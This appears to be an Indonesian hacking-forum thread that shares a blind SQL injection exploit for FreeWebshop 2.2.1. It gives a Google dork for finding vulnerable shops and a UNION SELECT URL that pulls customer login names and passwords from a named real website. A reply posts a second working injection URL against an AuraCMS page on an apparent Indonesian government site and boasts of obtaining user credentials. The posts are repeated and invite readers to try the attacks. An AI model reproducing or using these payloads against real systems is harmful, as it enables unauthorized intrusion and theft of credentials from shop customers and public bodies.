FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit
Halaman 1 dari 1
FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit
google dork: "Powered by FreeWebshop.org 2.2.1"
contohwebsite: http://www.atelierinderoos.nl/
bug: index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION
====
jadi
http://www.atelierinderoos.nl/index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION
===
keterangan lengkap di
http://milw0rm.com/exploits/4740
maap bug lama tapi enak ni blind sql injection
===
selamat mencoba
contohwebsite: http://www.atelierinderoos.nl/
bug: index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION
====
jadi
http://www.atelierinderoos.nl/index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION
===
keterangan lengkap di
http://milw0rm.com/exploits/4740
maap bug lama tapi enak ni blind sql injection
===
selamat mencoba
Re: FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit
aduh
aura cms
dapet euy
http://www.banjar-jabar.go.id/redesign/index.php?pilih=links&mod=yes&aksi=lihat&kategori=&kid=-999'union+select+concat(0x74346d7520,user,0x20673074),0,0,concat(0x67656c347020,password,0x20673074),0,0,0,0,0,0%20from%20user+limit+0,1/*
situs pemerintah tuh?
mau diapain>
aura cms
dapet euy
http://www.banjar-jabar.go.id/redesign/index.php?pilih=links&mod=yes&aksi=lihat&kategori=&kid=-999'union+select+concat(0x74346d7520,user,0x20673074),0,0,concat(0x67656c347020,password,0x20673074),0,0,0,0,0,0%20from%20user+limit+0,1/*
situs pemerintah tuh?
mau diapain>
Halaman 1 dari 1
Permissions in this forum:
Anda tidak dapat menjawab topik
|
|